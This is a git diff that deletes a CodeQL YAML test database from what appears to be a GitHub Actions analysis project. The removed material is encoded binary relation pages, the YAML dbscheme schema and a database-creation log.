zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/ql/lib/test-db/db-yaml/default/pools/poolInfo b/ql/lib/test-db/db-yaml/default/pools/poolInfo deleted file mode 100644 index 6a51696b7cb94b49cb29a40c8f1618c418c97763..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 YcmZQz00Sl<$q2;mP#P?#`{RfV019gYQ2+n{ diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index 720d64f4baafc33efdf971f02084aca5f25b34a5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|<9Q00jU7 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum deleted file mode 100644 index c7704aa3482aaf78913dfb092fa6012f2e14e373..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf-vXzT>u200u%rM diff --git a/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 deleted file mode 100644 index c44d5f88d6c4629a84a90da758cdadf0ed87e804..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIufeipK2m&y5|Np!%OfcmEpjASE009C72oNAZU|(SND^EAR)9-T6b?$V_2@oJa UfB*pk1PBlyK!5-N0t5mDKAHFc2LJ#7 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index 42938ceef8f891f706d4353febf3984dc4886b15..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIuArXL36hzV201J``bRfqsfWpv)!6L|qK(n+!oSnI|{!~@<>70-I`ysXU+Nb=O to^9!JMt}eT0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PJ_C;00da2L}KE 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 deleted file mode 100644 index e312329da67e9cd0ca5fea26c379f7b94f230b77..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuu?>JA07Owoq0|C)vY;?QNB|SZcLANickRzLFW<)u{i-9j8d6FjmVM?ibDg=r zhL1y7YwPD;w#5h#AV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF 
z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs 
z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel deleted file mode 100644 index 5f848073652e137ce970cd362a76f858865fd7c4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum deleted file mode 100644 index 9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM 
diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index 573ab48b75431cf7a24d52077aa8a0371ccb9604..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum deleted file mode 100644 index 7aae4dc38a0fef1277b98a50776a547dd54eafc3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme deleted file mode 100755 index 20d83c71ee67..000000000000 --- a/ql/lib/test-db/db-yaml/yaml.dbscheme +++ /dev/null 
@@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); 
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json
deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json
deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log
deleted file mode 100644
index 8c7f3e173b71..000000000000
--- a/ql/lib/test-db/log/database-create-20240203.101754.571.log
+++ /dev/null
@@ -1,275 +0,0 @@
-[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test
-[2024-02-03 10:17:54] Log file was started late.
-[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db.
-[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db
-[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml.
-[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml.
